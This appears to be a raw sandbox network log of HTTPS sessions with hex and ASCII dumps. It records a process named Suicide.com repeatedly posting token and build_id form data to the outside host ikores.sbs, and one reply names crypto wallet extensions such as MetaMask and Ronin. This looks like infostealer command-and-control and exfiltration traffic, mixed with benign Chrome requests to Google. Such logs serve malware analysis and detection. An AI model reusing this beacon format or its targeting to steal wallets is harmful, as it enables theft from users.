                                                                                                                                                                                    2024-12-06 08:42:11 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 34 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------4OPHDT2D26F37YM7GV3EContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------4OPHDT2D26F37YM7GV3EContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------4OPHDT2D26F37YM7GV3ECont
                                                                                                                                                                                    2024-12-06 08:42:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:12 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:12 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.4498205.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:13 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XBS2DTRQIEUAIMGDJMG
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 5781
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:13 UTC5781OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 42 53 32 44 54 52 51 49 45 55 41 49 4d 47 44 4a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 53 32 44 54 52 51 49 45 55 41 49 4d 47 44 4a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 53 32 44 54 52 51 49 45 55 41 49 4d 47 44 4a 4d 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------6XBS2DTRQIEUAIMGDJMGContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------6XBS2DTRQIEUAIMGDJMGContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------6XBS2DTRQIEUAIMGDJMGCont
                                                                                                                                                                                    2024-12-06 08:42:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:14 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    7192.168.2.4498265.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:15 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8GDTJM7GVAAAIE3WBAAS
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:15 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 41 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 41 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 38 47 44 54 4a 4d 37 47 56 41 41 41 49 45 33 57 42 41 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------8GDTJM7GVAAAIE3WBAASContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------8GDTJM7GVAAAIE3WBAASContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------8GDTJM7GVAAAIE3WBAASCont
                                                                                                                                                                                    2024-12-06 08:42:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:16 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    8192.168.2.449837172.217.21.364437600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:18 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:19 GMT
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-DoMzpKYTKTRePk_MhkbegQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                    Server: gws
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2024-12-06 08:42:19 UTC124INData Raw: 64 32 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 65 72 76 6f 6e 74 61 20 64 61 76 69 73 22 2c 22 6d 6f 63 68 61 20 6d 6f 75 73 73 65 20 70 61 6e 74 6f 6e 65 20 63 6f 6c 6f 72 22 2c 22 63 68 72 69 73 74 6d 61 73 20 6d 75 73 69 63 20 63 68 72 69 73 74 6d 61 73 20 73 6f 6e 67 73 22 2c 22 73 6e 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22
                                                                                                                                                                                    Data Ascii: d24)]}'["",["gervonta davis","mocha mousse pantone color","christmas music christmas songs","snow storm weather forecast"
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 2c 22 6d 69 63 72 6f 73 6f 66 74 20 77 69 6e 64 6f 77 73 20 31 31 22 2c 22 77 72 61 6e 67 6c 65 72 20 6e 66 72 20 32 30 32 34 22 2c 22 70 61 6e 64 61 20 65 78 70 72 65 73 73 20 70 61 6e 64 61 20 68 6f 6f 64 69 65 22 2c 22 68 61 72 72 79 20 70 6f 74 74 65 72 20 73 65 76 65 72 75 73 20 73 6e 61 70 65 20 61 63 74 6f 72 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c
                                                                                                                                                                                    Data Ascii: ,"microsoft windows 11","wrangler nfr 2024","panda express panda hoodie","harry potter severus snape actor"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","googl
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 52 63 31 42 70 55 6e 4a 4f 61 57 6c 6b 65 57 74 55 61 30 55 33 4d 47 74 4d 63 33 56 51 54 45 64 58 4e 44 67 32 61 6a 5a 77 4d 6c 70 31 53 6d 49 79 59 54 52 6e 5a 32 35 72 61 47 35 69 5a 58 4a 52 65 45 64 52 52 46 42 56 52 55 78 36 62 6b 70 51 62 46 64 4d 57 48 4e 71 55 45 70 6a 55 58 42 51 4d 33 4e 4f 64 6e 56 49 5a 6c 4d 7a 54 56 52 33 53 33 45 31 4e 58 64 59 51 58 6c 55 4d 44 52 78 62 45 39 32 54 30 64 75 4e 48 51 7a 62 32 56 31 5a 6d 6c 77 63 6e 46 4d 52 33 4d 79 62 58 63 79 61 58 6c 34 61 44 46 6d 64 54 4e 4d 54 58 41 76 61 56 56 4e 55 55 4e 45 55 79 39 4f 4d 69 38 78 64 57 46 52 62 57 46 53 53 6c 5a 4b 4e 6b 31 31 54 31 42 52 5a 31 55 31 4c 30 56 55 55 55 5a 32 63 6c 64 35 61 33 52 54 61 6c 4d 79 4e 6d 34 34 54 6b 4e 4f 65 47 6f 34 4f 45 52 36 65 47
                                                                                                                                                                                    Data Ascii: Rc1BpUnJOaWlkeWtUa0U3MGtMc3VQTEdXNDg2ajZwMlp1SmIyYTRnZ25raG5iZXJReEdRRFBVRUx6bkpQbFdMWHNqUEpjUXBQM3NOdnVIZlMzTVR3S3E1NXdYQXlUMDRxbE92T0duNHQzb2V1ZmlwcnFMR3MybXcyaXl4aDFmdTNMTXAvaVVNUUNEUy9OMi8xdWFRbWFSSlZKNk11T1BRZ1U1L0VUUUZ2cld5a3RTalMyNm44TkNOeGo4OER6eG
                                                                                                                                                                                    2024-12-06 08:42:19 UTC467INData Raw: 57 56 4b 65 6d 6f 30 64 46 5a 51 4d 58 70 6a 4d 46 52 4c 62 33 6c 78 51 32 39 36 65 54 64 5a 64 31 6c 51 56 47 6c 54 4d 44 68 30 53 33 4e 32 55 45 73 77 62 46 56 54 52 57 74 7a 65 58 6c 33 52 30 46 4b 61 44 68 44 61 6d 39 77 42 6e 41 48 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67
                                                                                                                                                                                    Data Ascii: WVKemo0dFZQMXpjMFRLb3lxQ296eTdZd1lQVGlTMDh0S3N2UEswbFVTRWtzeXl3R0FKaDhDam9wBnAH","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"g
                                                                                                                                                                                    2024-12-06 08:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    9192.168.2.449838172.217.21.364437600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:19 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                    Version: 702228742
                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:19 GMT
                                                                                                                                                                                    Server: gws
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    2024-12-06 08:42:19 UTC372INData Raw: 31 63 63 35 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                    Data Ascii: 1cc5)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                    Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                    Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                    Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                    2024-12-06 08:42:19 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                    Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
